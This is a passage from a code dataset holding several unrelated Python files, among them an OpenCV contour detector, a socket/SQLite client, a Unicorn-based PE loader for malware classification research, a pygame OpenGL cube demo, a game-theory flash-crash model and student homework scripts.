pay_time_scope[1]))\n","sub_path":"upday/modules/associator/service/associator_service.py","file_name":"associator_service.py","file_ext":"py","file_size_in_byte":17640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"366133998","text":"__author__ = 'KolesnikG'\n\nimport numpy as np\nimport cv2\n\nname=str(input('Enter the file name: '))\nimg = cv2.imread(name)\nindex=name.find('.jpg')\nname=name[:index]+'(binRes)'+'.jpg'\n\n\ngray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n\ngray_blur = cv2.GaussianBlur(gray, (15, 15), 0)\nret, thresh = cv2.threshold(gray_blur,0,255,cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\nkernel = np.ones((3, 3), np.uint8)\nclosing = cv2.morphologyEx(thresh, cv2.MORPH_GRADIENT, kernel, iterations=1)\ncont_img=closing.copy()\nimage, contours, hierarchy = cv2.findContours(cont_img,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_NONE)\nprint('All contours:',len(contours))\n\n\ndef getCount(cnt):\n count=[]\n for c in contours:\n area = cv2.contourArea(c)\n if area < 700 or area > 1000000:\n continue\n else:\n count+=[c]\n return count\nprint('After calibration:',len(getCount(contours)))\n\ndef getMask(cnt, i):\n mask = np.zeros_like(thresh)\n cv2.drawContours(mask, cnt,i, 255, -1)\n out = np.zeros_like(thresh)\n out[mask == 255] = thresh[mask == 255]\n return out\n\ndef getContourImage(cnt,i):\n box=np.int0(cv2.boxPoints(cv2.minAreaRect(cnt[i])))\n x=box[0][0];y=box[1][1]\n w=box[3][0];h=box[0][1]\n\n z=getMask(cnt,i)[y:h,x:w]\n\n if z.size==0:\n return False\n elif cv2.countNonZero(z)/z.size<0.2:\n return False\n else:\n print('Rectangle','x:',x,', y:',y,', w:',w,', h:',h)\n return True\n\nc=getCount(contours)\nfor i in range(0,len(c)):\n if getContourImage(c,i)==True:\n ell = cv2.fitEllipse(c[i])\n cv2.ellipse(img, ell, (0,255,0), 2)\n box=np.int0(cv2.boxPoints(cv2.minAreaRect(c[i])))\n cv2.drawContours(img,[box],0,(0,0,255),1)\n\ncv2.imwrite(name,img)\nprint('Image was saved in program folder(dest) with name:',name)","sub_path":"detection/dark_areas2.0.py","file_name":"dark_areas2.0.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"300457631","text":"import socket\nimport sqlite3\nimport time\nimport json\nimport sys\n\nHOST = '127.0.0.1'\nPORT = 5000\nBUFFER_SIZE = 8192\n\ndef get_data(s, BUFFER_SIZE):\n data = b''\n while True:\n part = s.recv(BUFFER_SIZE)\n data += part\n if len(part) < BUFFER_SIZE: # either 0 or end of data\n break\n\n return data\n\ndef format_data(data):\n if len(data) <= 99999 and len(data) > 9999:\n return str(len(data)+5) + \"HOLIS\" + data\n elif len(data) <= 9999 and len(data) > 999:\n return \"0\" + str(len(data)+5) + \"HOLIS\" + data\n elif len(data) <= 999 and len(data) > 99:\n return \"00\" + str(len(data)+5) + \"HOLIS\" + data\n elif len(data) <= 99 and len(data) > 9:\n return \"000\" + str(len(data)+5) + \"HOLIS\" + data\n elif len(data) <= 9 and len(data) > 0:\n return \"0000\" + str(len(data)+5) + \"HOLIS\" + data\n elif len(data) == 0:\n return \"00005HOLIS\"\n else:\n return \"00010HOLISERROR\"\n\n#def formatted_message(service: str, msg: str):\n# length = len(service + msg)\n# if len(service) != 5:\n# raise Exception('El largo del nombre del servicio debe ser igual a 5')\n# if len(msg) == 0:\n# raise Exception('Falta el mensaje')\n# if length > 99999:\n# raise Exception('Mensaje excede el largo de 99999 caracteres')\n# left_padding = '0'*(5 - len(f'{length}'))\n# return str.encode(left_padding + str(length) + service + msg)\n\ndef get_product_json(data):\n\tkeys = ['id', 'name', 'country', 'date']\n\tjson_object = []\n\n\tfor elem in data:\n\t\tdic = {}\n\t\tfor item in enumerate(keys):\n\t\t\tdic[item[1]] = elem[item[0]]\n\t\tjson_object.append(dic)\n\n\treturn json.dumps(json_object)\n\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.connect((HOST, PORT))\n s.sendall(b'00010sinitHOLIS')\n data = get_data(s, BUFFER_SIZE)\n print('Received1 ', data.decode('utf-8'))\n\n while True:\n data2 = get_data(s, BUFFER_SIZE)\n print('Received2 ', data2.decode('utf-8'))\n # time.sleep(5)\n\n conn = sqlite3.connect('Project.db')\n c = conn.cursor()\n\n if len(data2) == 10:\n c.execute(\"SELECT * FROM CLIENTS\")\n\n aux1 = get_product_json(c.fetchall())\n aux2 = format_data(aux1)\n conn.commit()\n conn.close()\n \n #aux2 = bytes(aux2, 'utf-8')\n #print(aux2, type(aux2)) \n #print(sys.getsizeof(bytes(aux2, 'utf-8')))\n \n \n if aux2:\n #s.sendall(b'00010HOLISTAMOS')\n s.sendall(bytes(aux2, 'utf-8'))\n \n \n s.close()\n\n\n\n#c.execute('''CREATE TABLE CLIENTS\n# ([generated_id] INTEGER PRIMARY KEY,[Client_Name] text, [Country_ID] integer, [Date] date)''')","sub_path":"services/db/Test_Select.py","file_name":"Test_Select.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"394238394","text":"from rest_framework import status\nfrom rest_framework.exceptions import APIException, _get_error_details\n\n\nclass GenericAPIException(APIException):\n status_code = status.HTTP_500_INTERNAL_SERVER_ERROR\n default_detail = 'A server error occurred.'\n default_code = 'error'\n\n def __init__(self, status_code=None, detail=None, code=None):\n if status_code is None:\n status_code = self.status_code\n if detail is None:\n detail = self.default_detail\n if code is None:\n code = self.default_code\n\n self.detail = _get_error_details(detail, code)\n self.status_code = status_code\n","sub_path":"api/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"633250484","text":"'''\nPython Programming hw7\n21500426\nSi Hyung You\n2018/04/25\n'''\nimport copy #for using deepcopy later, import copy function\nimport hw7module as m\ncheck=0\n#initialize 'sales' list with ten people, and their sales\nsales=[['김기수',79,34,45,50],['최영호',100,122,89,90],['김영후',34,45,23,67],\n ['홍미수',56,78,42,67],['박수민',118,135,90,99],['이성준',23,33,63,12],\n ['최미영',121,234,213,154],['김홍일',56,45,23,67],['박성민',67,77,45,89],['이수빈',56,50,65,23]]\n\n#first, add all salesman's sales for total sales and append it to each row\nfor i in range(len(sales)):\n totalsale = 0\n for j in range(4):\n totalsale += sales[i][j+1]\n sales[i].append(totalsale)\n print(sales[i])\n\n\nwhile True:\n print('*'*10, 'MENU', '*'*10) #repeat next menus unless user types F or f\n print(\"A. print salesman's sales\")\n print(\"B. specific person's sales\")\n print(\"C. sorting by sales\")\n print(\"D. add new salesman\")\n print(\"E. delete salesman\")\n print(\"F. terminate program\")\n print('*'*10, 'MENU', '*'*10)\n #store user's choice in variable so that program can determine which menu to execute\n choice = input(\"choose the menu: \")\n if choice == 'A' or choice == 'a':\n m.menu_A(sales)\n \n elif choice == 'B' or choice == 'b':\n m.menu_B(sales)\n\n elif choice == 'C' or choice == 'c':\n index = int(input(\"which index for sorting?: (0. name, 1. 1st quarter, 2. 2nd quarter, 3. 3rd quarter, 4. 4th quarter, 5. total sales) \"))\n m.menu_A(m.menu_C(sales, index)) #print sorted function(which differs from the original one) which being returned from menu_C \n\n elif choice == 'D' or choice == 'd':\n m.menu_D(sales)\n \n elif choice == 'E' or choice == 'e':\n index = int(input(\"which index for delete? \"))\n m.menu_E(sales, index)\n \n elif choice == 'F' or choice == 'f':\n break\n\n else:\n print(\"choose menu again..\") #if user types menu which is not suggested, tell them to choose again\n\nprint(\"Bye\")\n\n\n","sub_path":"hw7/21500426_hw7_SihyungYou.py","file_name":"21500426_hw7_SihyungYou.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"251057392","text":"#!/usr/bin/python\n# This file only is used to test code\n\n\nfrom capstone import *\n\n# using pefile module to handle PE file and dlls\nimport pefile\n\n# For handling arguments\nimport argparse\n\n# for interate a directory\nimport os\n\n# packing value\nimport struct\n\n# loading constants\nimport constants\n\n# For emulation, we use unicorn engine\nfrom unicorn import *\nfrom unicorn.x86_const import *\n\n\n# for PE class\nimport pe\n\n# Data structure\nimport datastructure\n\n# Now we can handle a dll. What we want to do here is to get dll's content\n# and also the dll's metadata \ndef dll_loader( dllPath, Dll, dllBase, dllNameBase, ldrBase):\n\n\t# Specify dll path\n\tdllName = dllPath.split('/')[1]\n\n\tDll.setName(dllName)\n\n\t# root dir of dlls\n\tDll.setDir(dllPath)\n\n\t# set dll name\n\tDll.setName(dllName)\n\n\t# parse dll\n\ttry:\n\t\tdll = pefile.PE(dllPath)\n\texcept pefile.PEFormatError:\n\t\tpass\n\n\t# Parse data directories\n\tdll.parse_data_directories()\n\n\t# Get dll's contents\n\tdata = str(bytearray(dll.get_memory_mapped_image()))\n\n\t# set content of dll\n\tDll.setData(data)\n\n\t# set DLL base\n\tDll.setDllBase(dllBase)\n\n\t# Set DLL name base\n\tDll.setDllNameBase(dllNameBase)\n\n\t# Set LDR base\t\n\tDll.setLdrBase(ldrBase)\n\n\t# Set dllBase for dll\n\tDll.setSizeOfImage(dll.OPTIONAL_HEADER.SizeOfImage)\n\n\t# Set entrypoint\n\tDll.setEntryPoint(dll.OPTIONAL_HEADER.AddressOfEntryPoint)\n\n\t# set import dll\n\tfor entry in dll.DIRECTORY_ENTRY_EXPORT.symbols:\n\t\tprint(\"entry address 0x%08x \" % (entry.address))\n\t\tprint(\"Dll Base 0x%08x \" % (Dll.getDllBase()))\n\t\tDll.setImpDll(entry.address, entry.name)\n\n\t# display import dll\n\tDll.getImpDll()\n\n\n\t# returns size of dll and base address\n\treturn Dll\n\n\t# Populate ldr instance\n\t#ldr.init_ldr()\n\n\n# Loading dlls into memory\ndef loadDlls(mu, dll):\n\n\t# Write dll content into memory at the address dllBase\n\t# We need the dll content and the address we are going to write\n\t# get DLL's content\n\tprint(\">>> Writing Dll data into memory\")\n\tdllData = dll.getData()\n\t# get DLL's base address\n\tdllBase = dll.getDllBase()\n\tmu.mem_write(dllBase, dllData)\n\n\t# Write dll name into memory ad the address dllNameBase\n\t# We need the dll name and the adress we are going to write\n\t# get DLL's name\n\tprint(\">>> Writing Dll name into memory\")\n\tdllName = dll.getName()\n\n\t# get name base address\n\tdllNameBase = dll.getDllNameBase()\n\tmu.mem_write(dllNameBase, dllName)\n\n\t# Write LDR module to memory\n\t#mu.mem_write(ldrBase, )\n\n\n# Parse input pe\ndef parse_pe(newFile, peobj):\n\n\t# Open PE file\n\tpef = pefile.PE(newFile, fast_load = True)\n\n\t# If the PE file was loaded usign the fast_load=True argument, \n\t# we will need to parse the data directories\n\tpef.parse_data_directories()\n\n\t# Finding entrypoint\n\tpeobj.setEntryPoint(pef.OPTIONAL_HEADER.AddressOfEntryPoint)\n\tprint(\"Entry point: 0x%08x \" % (peobj.getEntryPoint()))\n\n\t# Iterate imports and popluate pe\n\tfor entry in pef.DIRECTORY_ENTRY_IMPORT:\n\n\t\tfor imp in entry.imports:\n\n\t\t\t# import name\n\t\t\tpeobj.setImportName(imp.name)\n\n\t\t\t# import address\n\t\t\tpeobj.setImportAddr(imp.address)\n\n\t\t\t# import's library\n\t\t\tpeobj.setImportLib(entry.dll)\n\t\t\t#print(\"%s : 0x%08x: %s\" % (peobj.getImportName(), peobj.getImportAddr(), peobj.getImportLib()))\t\n\n\t# Iterate sections\n\tfor section in pef.sections:\n\n\t\t# section name\n\t\tpeobj.setSectionName(section.Name)\n\n\t\t# virtual address\n\t\tpeobj.setSectionVirAddr(section.VirtualAddress)\n\n\t\t# virtual size\n\t\tpeobj.setSectionVirSize(section.Misc_VirtualSize)\n\n\t\t# raw size\n\t\tpeobj.setSectionSizeOfRawData(section.SizeOfRawData)\n\n\t\t# Test\n\t\tprint(\"%s : 0x%08x: 0x%08x: 0x%08x\" %(peobj.getSectionName(), peobj.getSectionVirAddr(),\n\t\t\tpeobj.getSectionVirSize(), peobj.getSectionSizeOfRawData()))\n\n\t\t# Look for an entry point in a section\n\t\tif section.contains_rva(peobj.getEntryPoint()):\n\t\t\tprint(\"Section %s contains an entry point\" % (peobj.getSectionName()))\n\n\t\t\t# populate a text section with match section\n\t\t\tpeobj.setCodeSection(section)\n\n\t\t\t# set size of text section\n\t\t\tpeobj.setCodeSectionSize(peobj.getSectionSizeOfRawData())\n\n\t\t\tprint(\"Code section size : 0x%08x\" % (peobj.getCodeSectionSize()))\n\n\n\t# Rewrite Import Address Table\n\tpeobj.setData(bytearray(pef.get_memory_mapped_image()))\n\n\n\n\n\n\n# main function\ndef main():\n\n\t# parse arguments\n\t# Create an ArgumentParser object\n\tparser = argparse.ArgumentParser(prog = \"Malware Classification\", description = 'Searching an export in a DLL')\n\n\t# Add the first argument: a path to the dll\n\tparser.add_argument('-d', dest='dll_path', help='Specify a dll path')\n\n\t# Add the second argument: an disired export\n\tparser.add_argument('-e', dest='export', help='Specify a disired export')\n\n\t\t# Add the second argument: an disired export\n\tparser.add_argument('-f', dest='file', help='Specify a disired pe file')\n\n\t# Let's parse arguments, the arguments are accessed through args variable\n\targs = parser.parse_args()\n\n\t# Test\n\tpeobj = pe.PE()\n\n\tparse_pe(args.file, peobj)\n\n\t# Create a LDR instance\n\tx86os = datastructure.X86_OS()\n\n\tDlls = []\n\t# Time for unicorn\n\ttry:\n\n\t\t# Initialize an emulator in X86-32bit mode\n\t\tmu = Uc(UC_ARCH_X86, UC_MODE_32)\n\n\t\t# Map 10MB memory for the emulation\n\t\tmu.mem_map(constants.FS_0, 100 * 1024 * 1024)\n\n\t\t# Initializing Stack frame\n\t\tfss = x86os.init_FS()\n\t\tmu.mem_write(constants.FS_0, fss)\n\t\t\n\t\t# FS register\n\t\tmu.reg_write(UC_X86_REG_FS, constants.FS_0)\t\n\t\t\t\n\t\t# initializing PEB\n\t\tprint(\"Initializing PEB\")\n\t\tmu.mem_write(constants.PEB_ADD, x86os.init_peb())\n\n\t\t# initializing TEB\n\t\tprint(\"Initializing TEB\")\n\t\tmu.mem_write(constants.TEB_ADD, x86os.init_teb())\n\n\t\t# initializing stack of emulator\n\t\tmu.reg_write(UC_X86_REG_EBP, constants.STACK_BASE)\n\t\tmu.reg_write(UC_X86_REG_ESP, constants.STACK_BASE)\n\n\t\t# Testing\n\t\tprint(\"PEB\", mu.mem_read(constants.PEB_ADD , len(x86os.init_peb())))\n\t\tprint(\"TEB\", mu.mem_read(constants.TEB_ADD , len(x86os.init_teb())))\n\t\tprint(\"FS\", mu.mem_read(constants.FS_0 , len(x86os.init_FS())))\n\t\tprint(\"FS register: 0x%08x \" % (mu.reg_read(UC_X86_REG_FS)))\n\t\tprint(\"ESP register: 0x%08x \" % (mu.reg_read(UC_X86_REG_ESP)))\n\t\tprint(\"EBP register: 0x%08x \" % (mu.reg_read(UC_X86_REG_EBP)))\n\t\t# Loading dlls\n\t\tprint(\"\\n>>> Loading DLLs...\")\n\n\t\t# Iterate DLL directory\n\t\tfor subdir, dirs, files in os.walk(args.dll_path):\n\n\t\t\t# We need a based address for dlls\n\t\t\tdllBase = 0x550000\n\n\t\t\t# Base address of DLL name\n\t\t\tdllNameBase = 0x2500\n\n\t\t\t# Base address of LDR module\n\t\t\tldrBase = 0x9000\n\n\t\t\t# Number of Dlls in a directory\n\t\t\tNoOfDlls = 0\n\n\t\t\t# List of ldr address, to keep track order of the list\n\t\t\tldrList = []\n\n\t\t\t# List of in memory Dlls\n\t\t\t#dllList = DllList()\n\n\t\t\tdllList = datastructure.DoubleList()\n\n\t\t\t# Iterate dlls in the directory\n\t\t\tfor file in files:\n\n\t\t\t\t# Increase number of Dlls by 1\n\t\t\t\tNoOfDlls = NoOfDlls + 1\n\n\t\t\t\t# get fullpath of dll\n\t\t\t\tfullpath = os.path.join(subdir, file)\n\n\t\t\t\t# Create an instance of DLL\n\t\t\t\tdllobj = pe.Dll()\n\n\t\t\t\t# size of the current dll\n\t\t\t\tdllobj = dll_loader(fullpath, dllobj, dllBase, dllNameBase, ldrBase)\n\n\t\t\t\t# Writing dll components into memory\n\t\t\t\t# Loading the dll into memory\n\t\t\t\tloadDlls(mu, dllobj)\n\n\t\t\t\tprint(\"Reading %d bytes from [0x%08x]: %s\" % (dllobj.sizeOfDllName(),\n\t\t\t dllobj.getDllNameBase(), mu.mem_read(dllobj.getDllNameBase(),dllobj.sizeOfDllName())))\n\t\t\t\tprint(\"\\n\")\n\n\t\t\t\t# size of Dll\n\t\t\t\tdllSize = dllobj.sizeOfData()\n\n\t\t\t\t# Store Dll instances into the list\n\t\t\t\tDlls.append(dllobj)\n\n\t\t\t\t# inmemory lsit\n\t\t\t\t#dllList.add(dll)\n\n\t\t\t\tdllList.append(dllobj)\n\n\t\t\t\t# Update ldrList\n\t\t\t\tldrList.append(ldrBase)\n\n\t\t\t\t# Align memory to load the next dlls\n\t\t\t\tdllBase = dllBase + dllSize\n\n\t\t\t\t# Adjust base address of DLL\n\t\t\t\tdllNameBase = dllNameBase + 200\n\t\t\t\t\n\t\t\t\t# Each LDR module takes a memory of 8192 Byte\n\t\t\t\t# This means we increase the base 0x2000 for each interation\n\t\t\t\tldrBase = ldrBase + 8192 # 0x2000\n\n\t\t# Print in-memory list\n\t\tdllList.show()\n\n\n\texcept UcError as e:\n\t\tprint(\"ERROR: %s\" % e)\n\t\tmu.emu_stop()\n\nif __name__ == \"__main__\":\n\tmain()\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":7889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"83275022","text":"import pygame\nfrom pygame.locals import *\nfrom random import *\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\n\nANGLE_ROT = 20\nNB_CUBES = 2\nNUM_GENERE = 0\nNO_CUBE = 0\nALEAT = [[(random(),random(),random()) for _ in range(NB_CUBES*3*4*6)] for _ in range(NB_CUBES)]\n\nverticies = (\n (1, -1, -1),\n (1, 1, -1),\n (-1, 1, -1),\n (-1, -1, -1),\n (1, -1, 1),\n (1, 1, 1),\n (-1, -1, 1),\n (-1, 1, 1)\n )\n\nedges = ((0,1),(0,3),(0,4),(2,1),(2,3),(2,7),(6,3),(6,4),(6,7),(5,1),(5,4),(5,7))\nsurfaces = ((0,1,2,3),(3,2,7,6),(6,7,5,4),(4,5,1,0),(1,5,7,2),(4,0,3,6))\n\ndef Cube(verticies=verticies):\n global NO_CUBE\n glBegin(GL_QUADS)\n for surface in surfaces:\n #x = 0\n NUM_GENERE = 0\n for vertex in surface:\n #x+=1\n #glColor3fv(colors[randint(0,len(colors)-1)]) # Cube épileptique !\n #glColor3fv((random(),random(),random()))\n #print(ALEAT)\n print(NO_CUBE,NUM_GENERE)\n glColor3fv(ALEAT[NO_CUBE][NUM_GENERE])\n NUM_GENERE+=1\n glVertex3fv(verticies[vertex])\n glEnd()\n NO_CUBE+=1\n print(NO_CUBE,\"END FUNCTION CUBE\")\n\n glBegin(GL_LINES)\n for edge in edges:\n for vertex in edge:\n glVertex3fv(verticies[vertex])\n glEnd()\n\ndef main():\n pygame.init()\n display = (800,600)\n pygame.display.set_mode(display, DOUBLEBUF|OPENGL)\n\n gluPerspective(45, (display[0]/display[1]), 0.1, 50.0)\n\n glTranslatef(0,0, -10)\n\n glRotatef(25, 2, 1, 0)\n\n while True:\n \n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_KP4:\n glTranslatef(-0.5,0,0)\n if event.key == pygame.K_KP6:\n glTranslatef(0.5,0,0)\n if event.key == pygame.K_KP8:\n glTranslatef(0,1,0)\n if event.key == pygame.K_KP2:\n glTranslatef(0,-1,0)\n \n if event.key == pygame.K_PAGEDOWN:\n glRotatef(ANGLE_ROT, 1, 0, 0)\n if event.key == pygame.K_PAGEUP:\n glRotatef(ANGLE_ROT, -1, 0, 0)\n if event.key == pygame.K_UP:\n glRotatef(ANGLE_ROT, 0, 1, 0)\n if event.key == pygame.K_DOWN:\n glRotatef(ANGLE_ROT, 0, -1, 0)\n \n if event.key == pygame.K_RIGHT:\n glRotatef(ANGLE_ROT, 0, 0, 1)\n if event.key == pygame.K_LEFT:\n glRotatef(ANGLE_ROT, 0, 0, -1)\n\n #glRotatef(1, 3, 1, 1)\n glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT)\n Cube()\n #Cube([list(map(lambda x:x/2,e)) for e in verticies])\n pygame.display.flip()\n #pygame.time.wait(0)\n\nmain()\n","sub_path":"test pls cubes.py","file_name":"test pls cubes.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"279140620","text":"import copy\n\nfrom AssetFundNetwork import AssetFundsNetwork\nimport random\n\nfrom common import copy_network\nfrom constants import ATTACKER, CHANCE, DEFENDER, MARKET, BUY, SELL, SIM_TRADE\nfrom games.bases import GameStateBase\n\n\nclass PlayersHiddenInfo:\n def __init__(self,attacker_attack, attacker_pid, defender_budget):\n self.attacker_attack = attacker_attack\n self.attacker_pid = attacker_pid\n self.defender = defender_budget\n\n def __eq__(self, other):\n return isinstance(other, PlayersHiddenInfo) and self.defender == other.defender and\\\n self.attacker_attack == other.attacker_attack and self.attacker_pid == other.attacker_pid\n\n\nclass PortfolioFlashCrashGameStateBase(GameStateBase):\n\n def __init__(self, parent, to_move, actions, af_network, players_info, actions_history):\n super().__init__(parent=parent, to_move = to_move,actions=actions)\n self.actions_history=actions_history\n self.af_network = af_network\n self.players_info = players_info\n self.children = {}\n\n def inf_set(self):\n return self._information_set\n\n def evaluation(self):\n if not self.is_terminal():\n raise RuntimeError(\"trying to evaluate non-terminal node\")\n\n return -1*self.af_network.count_margin_calls()\n\n\nclass PortfolioFlashCrashRootChanceGameState(GameStateBase):\n def __init__(self, action_mgr, af_network:AssetFundsNetwork, defender_budget):\n self._chance_prob = action_mgr.get_portfolios_prob()\n portfolios = {x: y.order_set for x, y in action_mgr.get_portfolios().items() if x in self._chance_prob}\n super().__init__(parent=None, to_move=CHANCE, actions = portfolios.keys())\n self.af_network = af_network\n self.children = {\n str(p_id): PortfolioAttackerMoveGameState(\n parent=self, actions_manager=action_mgr, to_move=ATTACKER,\n players_info=PlayersHiddenInfo(p, p_id, defender_budget),\n af_network=af_network,\n actions_history={BUY:[],SELL:[],SIM_TRADE:[]}\n ) for p_id, p in portfolios.items()\n }\n\n self.tree_size = 1 + sum([x.tree_size for x in self.children.values()])\n\n def is_terminal(self):\n return False\n\n def inf_set(self):\n return \".\"\n\n def chance_prob(self):\n return self._chance_prob\n\n def sample_one(self):\n return random.choice(list(self.children.values()))\n\n\nclass PortfolioMarketMoveGameState(PortfolioFlashCrashGameStateBase):\n\n def __init__(self, parent, actions_manager, to_move, players_info, af_network, actions_history):\n self.terminal = af_network.no_more_sell_orders()\n if self.terminal:\n actions = []\n else:\n net2 = copy_network(af_network)\n actions = [str(net2.simulate_trade())]\n\n super().__init__(parent = parent, to_move = to_move, actions=actions,\n af_network = af_network, players_info=players_info, actions_history=actions_history)\n\n self._information_set = \".{0}.{1}.{2}\".format('MARKET_HISTORY:' + str(actions_history[SIM_TRADE])\n ,'BUY:'+str(af_network.buy_orders), 'SELL:'+str(af_network.sell_orders))\n\n if actions:\n action = actions[0]\n actions_history2 = copy.deepcopy(actions_history)\n actions_history2[SELL].append(action)\n actions_history2[BUY].append(action)\n actions_history2[SIM_TRADE].append(action)\n self.children[action] = PortfolioAttackerMoveGameState(\n self,\n actions_manager,\n ATTACKER,\n players_info,\n net2,\n actions_history2\n )\n self.tree_size = 1 + sum([x.tree_size for x in self.children.values()])\n\n def chance_prob(self):\n return 1\n\n def is_terminal(self):\n return self.terminal\n\n\nclass PortfolioAttackerMoveGameState(PortfolioFlashCrashGameStateBase):\n def __init__(self, parent, actions_manager, to_move, players_info, af_network, actions_history):\n actions = actions_manager.get_possible_attacks_from_portfolio(players_info.attacker_attack, af_network.no_more_sell_orders())\n self.terminal = not actions\n\n super().__init__(parent=parent, to_move=to_move, actions = [str(x['action_subset']) for x in actions ],\n af_network=af_network, players_info=players_info, actions_history=actions_history)\n\n for action in actions:\n order_set = action['action_subset']\n net2 = copy_network(af_network)\n net2.submit_sell_orders(order_set)\n actions_history2 = copy.deepcopy(actions_history)\n actions_history2[SELL].append(str(order_set))\n self.children[str(order_set)] = PortfolioDefenderMoveGameState(\n self,\n actions_manager,\n DEFENDER,\n PlayersHiddenInfo(action['remaining_orders'], players_info.attacker_pid, players_info.defender),\n net2,\n actions_history2,\n )\n\n self.tree_size = 1 + sum([x.tree_size for x in self.children.values()])\n self._information_set = \".{0}.{1}\".format(players_info.attacker_pid, 'A_HISTORY:' + str(actions_history[SELL]))\n\n def is_terminal(self):\n return self.terminal\n\n\nclass PortfolioDefenderMoveGameState(PortfolioFlashCrashGameStateBase):\n\n def __init__(self, parent, actions_manager, to_move, players_info, af_network, actions_history):\n defenses = actions_manager.get_possible_defenses(af_network, players_info.defender)\n str_order_sets = [str(x[0]) for x in defenses]\n super().__init__(parent=parent, to_move=to_move, actions=str_order_sets,\n af_network=af_network, players_info=players_info, actions_history=actions_history)\n\n# if not defenses:\n# self.budget.defender = 0 #in case there is only a small amount of money\n # else:\n for order_set, cost in defenses:\n net2 = copy_network(af_network)\n net2.submit_buy_orders(order_set)\n actions_history2 = copy.deepcopy(actions_history)\n actions_history2[BUY].append(str(order_set))\n self.children[str(order_set)] = PortfolioMarketMoveGameState(\n self,\n actions_manager,\n MARKET,\n PlayersHiddenInfo(players_info.attacker_attack, players_info.attacker_pid, players_info.defender - cost),\n net2,\n actions_history2\n )\n self._information_set = \".{0}.{1}\".format(players_info.defender, 'D_HISTORY:' + str(actions_history[BUY]))\n self.tree_size = 1 + sum([x.tree_size for x in self.children.values()])\n\n def is_terminal(self):\n return False\n\n\n\n\n","sub_path":"games/flash_crash/flash_crash_players_portfolio_cfr.py","file_name":"flash_crash_players_portfolio_cfr.py","file_ext":"py","file_size_in_byte":6932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"474586079","text":"\r\ndef a_sum():\r\n N = 5 #antall ledd\r\n summen = 0 #summen av 0 ledd\r\n for i in range(1,N):\r\n x_i = 1/i**2 #i-ende leddet\r\n summen = summen + x_i #summen med det i-ende leddet\r\n print(summen)\r\n\r\ndef b_sum():\r\n tol = 0.00000000000000001 #feiltoleranse\r\n x_i = 1 #nullte leddet\r\n i = 1 #ledd-teller\r\n summen = 1 #summen av 1 ledd \r\n while x_i - 1/(i+1)**2 > tol:\r\n x_i = 1/(i+1)**2\r\n summen = summen + x_i\r\n i += 1\r\n print(\"Summen er \",summen,\" og antall ledd er \", i)\r\n\r\na_sum()\r\n\r\nb_sum()\r\n","sub_path":"tdt4110/Øving 3/sum.py","file_name":"sum.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"541878902","text":"import os,sys,imp,time,romkan,copy,re,functools,itertools\nfrom collections import OrderedDict\nfrom collections import defaultdict\n#from mecabtools import mecabtools\n#imp.reload(mecabtools)\nfrom pythonlib_ys import main as myModule\nfrom pythonlib_ys import jp_morph\nimp.reload(myModule)\nHomeDir=os.getenv('HOME')\nmecabtools=imp.load_source('mecabtools',os.path.join(HomeDir,'myProjects/myPythonLibs/mecabtools/mecabtools.py'))\nimport mecabtools\nimp.reload(mecabtools)\nfrom probability import probability\nimp.reload(probability)\n\nDebug=1\n\ndef main0(LexFPs,MecabCorpusFPs,CorpusOnly=False,FreqWdFP=None,UnnormalisableMarkP=True,ProbExemplarFP=None,OutFP=None):\n LexDir=os.path.dirname(LexFPs[0])\n RelvFts=('cat','subcat','subcat2','sem','infform','infpat','pronunciation')\n ProbExemplars=get_exemplars(ProbExemplarFP) if ProbExemplarFP else None\n Frequents=collect_freq_wds(FreqWdFP,1000) if FreqWdFP else set()\n OutFPStem='--'.join([os.path.basename(LexFP) for LexFP in LexFPs])\n HClusters,_=myModule.ask_filenoexist_execute_pickle(OutFPStem+'.pickle',get_clustered_homs,([LexFPs,RelvFts],{'Frequents':Frequents,'ProbExemplars':ProbExemplars,'OutFP':OutFPStem+'.out'}))\n if Debug:\n print_clustered_homs(HClusters,OutFP=os.path.join(LexDir,'exemplarless_clusters.txt'))\n LexFPs=[] if CorpusOnly else LexFPs\n for MecabFile,CorpusOrDic in [(LexFP,'dic') for LexFP in LexFPs]+[(MecabCorpusFP,'corpus') for MecabCorpusFP in MecabCorpusFPs]:\n sys.stderr.write('\\n\\nNormalising a '+CorpusOrDic+' '+MecabFile+'\\n')\n time.sleep(2)\n FN=os.path.basename(MecabFile)\n NewFN=myModule.change_stem(FN,'.normed')\n NewDir=os.path.join(os.path.dirname(MecabFile),'normed')\n if not os.path.isdir(NewDir):\n os.makedirs(NewDir)\n if OutFP:\n OutFP=OutFP\n else:\n OutFP=os.path.join(NewDir,NewFN)\n normalise_mecabfile(MecabFile,RelvFts,HClusters,OutFP=OutFP,CorpusOrDic=CorpusOrDic,UnnormalisableMarkP=UnnormalisableMarkP)\n\n\ndef print_clustered_homs(ClusteredHs,OutFP=None):\n Out=open(OutFP,'wt') if OutFP else sys.stdout\n for ClusteredH in ClusteredHs:\n if Debug<2 and ClusteredH.exemplar is None:\n 